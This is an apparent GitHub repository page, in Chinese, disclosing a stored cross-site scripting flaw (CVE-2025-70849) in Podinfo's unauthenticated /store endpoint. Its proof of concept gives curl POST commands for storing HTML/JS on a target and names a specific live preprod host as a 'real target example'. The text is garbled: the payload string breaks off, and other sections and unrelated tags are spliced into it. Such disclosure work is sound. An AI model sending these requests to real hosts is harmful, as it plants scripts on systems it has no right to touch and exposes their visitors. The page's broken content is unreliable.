deaprojects/CVE-2025-70849
GitHub: deaprojects/CVE-2025-70849
Podinfo 6.10.0及以下版本/store端点存在未授权存储型XSS漏洞的概念验证与漏洞详情披露。
Stars: 0 | Forks: 0
# CVE-2025-70849:Podinfo 中的存储型 XSS
## 概述
在 **Podinfo**(一个用于演示 Kubernetes 微服务的 Web 应用)中发现了一个安全漏洞 (CWE-79)。`/store` 功能允许未经身份验证的用户上传任意的 HTML/JS 内容,从而导致存储型 XSS。
## 漏洞详情
- **CVE ID:** CVE-2025-70849
- **产品:** Podinfo
- **受影响端点:** `/store`
- **漏洞类型:** 存储型跨站脚本攻击 (XSS)
- **受影响版本:** `<= 6.10.0`
## 概念验证
1. 发送恶意 payload:
curl -X POST https://target/store -H "Content-Type: text/html" -d '/store/
示例:https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store/8c1591e1b1e025067a2d73c0853b9a76bd8fc91a
## 时间线
- **发现日期:** 2025年9月
- **通报厂商:** 2025年10月25日
- **厂商回应:** 已确认;表示目前没有修复时间表。
- **公开发布:** 2026年2月
## 免责声明
本研究仅供教育目的使用。
## 致谢:
[Kazi Sabbir](https://github.com/kazisabu/CVE-2025-70849-Podinfo/tree/main) |
## 严重程度:中等 6.4
CVE-2025-70849
' 真实目标示例: curl -X POST https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store -H "Content-Type: text/html" -d 'CVE-2025-70849
' 2. 访问返回的哈希值:https://标签:CISA项目, CVE-2025-70849, CWE-79, Go语言工具, PoC, Podinfo, Web安全, 多模态安全, 子域名突变, 存储型XSS, 安全研究与披露, 数据可视化, 暴力破解, 未授权访问, 漏洞分析, 网络安全, 蓝队分析, 跨站脚本攻击, 路径探测, 隐私保护